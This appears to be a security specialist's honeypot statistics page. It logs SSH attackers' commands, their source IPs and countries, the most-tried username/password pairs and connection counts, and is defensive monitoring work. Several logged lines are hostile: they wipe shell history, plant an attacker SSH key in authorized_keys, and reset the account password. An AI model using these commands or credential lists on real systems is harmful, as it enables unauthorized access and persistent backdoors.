# Ethical Hacker & ICT Security Specialist
A honey pot is a computer system on the Internet that is expressly set up to attract and "trap" malicious traffic and people who attempt to penetrate other people's computer systems.
Essentially it's a software or hardware component used as decoy, in order to be able to study attacks in real time.
Look at my honeypot stats:
You can download dictionaries of passwords, usernames and pass+users collected from SSH attacks:
General honeypot stats below:
| Date | Command | Source | |
|---|---|---|---|
| 2019-04-20 23:56:50 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 61.91.109.55 | Thailand |
| 2019-04-20 23:50:41 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 64.52.23.105 | United States |
| 2019-04-20 23:00:57 | lscpu | grep Model | 115.236.33.226 | China |
| 2019-04-20 23:00:51 | uname -a | 115.236.33.226 | China |
| 2019-04-20 23:00:46 | uname | 115.236.33.226 | China |
| 2019-04-20 23:00:40 | top | 115.236.33.226 | China |
| 2019-04-20 23:00:36 | cat /proc/cpuinfo | grep model | grep name | wc -l | 115.236.33.226 | China |
| 2019-04-20 23:00:30 | uname -m | 115.236.33.226 | China |
| 2019-04-20 23:00:25 | w | 115.236.33.226 | China |
| 2019-04-20 23:00:20 | crontab -l | 115.236.33.226 | China |
| 2019-04-20 23:00:15 | ls -lh $(which ls) | 115.236.33.226 | China |
| 2019-04-20 23:00:15 | which ls | 115.236.33.226 | China |
| 2019-04-20 23:00:11 | free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | 115.236.33.226 | China |
| 2019-04-20 23:00:10 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | 115.236.33.226 | China |
| 2019-04-20 23:00:05 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | 115.236.33.226 | China |
| 2019-04-20 23:00:05 | cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} | 115.236.33.226 | China |
| 2019-04-20 23:00:00 | echo -e "gay\\naQWBQkFoXQFN\\naQWBQkFoXQFN"|passwd|bash | 115.236.33.226 | China |
| 2019-04-20 23:00:00 | Enter new UNIX password: | 115.236.33.226 | China |
| 2019-04-20 22:59:55 | cat /proc/cpuinfo | grep name | wc -l | 115.236.33.226 | China |
| 2019-04-20 22:49:38 | uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd | 106.12.90.123 | China |
| 2019-04-20 22:40:01 | lscpu | grep Model | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:39:56 | uname -a | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:39:49 | lscpu | grep Model | 92.81.222.217 | Romania |
| 2019-04-20 22:39:44 | uname | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:39:40 | uname -a | 92.81.222.217 | Romania |
| 2019-04-20 22:39:34 | top | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:39:29 | uname | 92.81.222.217 | Romania |
| 2019-04-20 22:39:22 | cat /proc/cpuinfo | grep model | grep name | wc -l | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:39:18 | top | 92.81.222.217 | Romania |
| 2019-04-20 22:39:12 | uname -m | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:39:07 | cat /proc/cpuinfo | grep model | grep name | wc -l | 92.81.222.217 | Romania |
| 2019-04-20 22:39:01 | w | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:56 | uname -m | 92.81.222.217 | Romania |
| 2019-04-20 22:38:51 | lscpu | grep Model | 178.128.162.10 | Greece |
| 2019-04-20 22:38:46 | crontab -l | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:41 | w | 92.81.222.217 | Romania |
| 2019-04-20 22:38:36 | uname -a | 178.128.162.10 | Greece |
| 2019-04-20 22:38:32 | crontab -l | 92.81.222.217 | Romania |
| 2019-04-20 22:38:27 | ls -lh $(which ls) | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:27 | which ls | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:23 | uname | 178.128.162.10 | Greece |
| 2019-04-20 22:38:17 | ls -lh $(which ls) | 92.81.222.217 | Romania |
| 2019-04-20 22:38:17 | which ls | 92.81.222.217 | Romania |
| 2019-04-20 22:38:13 | top | 178.128.162.10 | Greece |
| 2019-04-20 22:38:09 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:09 | free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:02 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:38:02 | cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} | 213.108.216.27 | Russian Federation |
| 2019-04-20 22:37:57 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | 92.81.222.217 | Romania |
| 2019-04-20 22:37:57 | free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | 92.81.222.217 | Romania |
| Date | Source | |
|---|---|---|
| 2019-04-21 00:00:06 | 5.188.86.211 | Ireland |
| 2019-04-21 00:00:06 | 5.188.87.51 | Russian Federation |
| 2019-04-21 00:00:05 | 134.19.187.75 | Netherlands |
| 2019-04-21 00:00:02 | 88.214.26.90 | |
| 2019-04-21 00:00:00 | 5.188.86.206 | Ireland |
| 2019-04-20 23:59:58 | 5.188.86.165 | Ireland |
| 2019-04-20 23:59:54 | 185.220.221.222 | Czech Republic |
| 2019-04-20 23:59:53 | 5.188.86.165 | Ireland |
| 2019-04-20 23:59:52 | 107.170.172.23 | United States |
| 2019-04-20 23:59:45 | 185.220.221.223 | Czech Republic |
| 2019-04-20 23:59:44 | 5.188.87.54 | Russian Federation |
| 2019-04-20 23:59:25 | 185.220.221.224 | Czech Republic |
| 2019-04-20 23:59:21 | 134.19.187.75 | Netherlands |
| 2019-04-20 23:59:18 | 185.220.221.224 | Czech Republic |
| 2019-04-20 23:59:08 | 134.19.187.78 | Netherlands |
| 2019-04-20 23:59:06 | 5.188.86.167 | Ireland |
| 2019-04-20 23:59:02 | 5.188.86.211 | Ireland |
| 2019-04-20 23:58:54 | 88.214.26.88 | |
| 2019-04-20 23:58:53 | 5.188.86.198 | Ireland |
| 2019-04-20 23:58:52 | 5.188.86.167 | Ireland |
| Count | Username | Password |
|---|---|---|
| 437715 | admin | admin123 |
| 13785 | root | changeme |
| 4242 | admin | |
| 1729 | admin | aerohive |
| 1294 | ubnt | ubnt |
| 760 | admin | admin |
| 511 | support | support |
| 419 | root | admin |
| 394 | user | user |
| 374 | service | service |
| 357 | root | !@ |
| 340 | pi | raspberry |
| 330 | usuario | usuario |
| 304 | 111111 | admin |
| 302 | adm | 12345678 |
| Count | Source | |
|---|---|---|
| 21821 | 5.188.86.174 | Ireland |
| 20211 | 5.188.86.211 | Ireland |
| 13033 | 5.188.87.49 | Russian Federation |
| 13028 | 88.214.26.88 | |
| 12719 | 5.188.87.54 | Russian Federation |
| 12696 | 5.188.87.55 | Russian Federation |
| 12611 | 88.214.26.89 | |
| 12455 | 88.214.26.94 | |
| 12340 | 185.220.221.223 | Czech Republic |
| 12279 | 5.188.87.53 | Russian Federation |
| 11856 | 185.220.221.203 | Czech Republic |
| 11470 | 5.188.86.170 | Ireland |
| 11157 | 5.188.87.51 | Russian Federation |
| 10754 | 5.188.86.208 | Ireland |
| 10729 | 5.188.86.194 | Ireland |
| 10716 | 88.214.26.90 | |
| 10648 | 5.188.87.52 | Russian Federation |
| 10622 | 185.220.221.222 | Czech Republic |
| 10584 | 5.188.86.169 | Ireland |
| 10520 | 5.188.86.195 | Ireland |
| Connections | Source | |
|---|---|---|
| 22690 | 5.188.86.174 | Ireland |
| 21049 | 5.188.86.211 | Ireland |
| 13579 | 88.214.26.88 | |
| 13201 | 88.214.26.89 | |
| 13167 | 5.188.87.49 | Russian Federation |
| 13093 | 88.214.26.94 | |
| 13053 | 5.188.87.54 | Russian Federation |
| 13051 | 5.188.87.55 | Russian Federation |
| 13022 | 185.220.221.223 | Czech Republic |
| 12799 | 5.188.87.53 | Russian Federation |
| 12344 | 185.220.221.203 | Czech Republic |
| 11904 | 5.188.86.170 | Ireland |
| 11325 | 5.188.87.51 | Russian Federation |
| 11310 | 5.188.87.52 | Russian Federation |
| 11289 | 5.188.86.208 | Ireland |
| 11181 | 5.188.86.169 | Ireland |
| 11162 | 5.188.86.197 | Ireland |
| 11137 | 88.214.26.90 | |
| 11115 | 5.188.86.195 | Ireland |
| 11099 | 185.220.221.222 | Czech Republic |
If you want to take a look to the source code of this page, go to my project HoneyStats! (github)
Want to know more? Check out my Security LAB!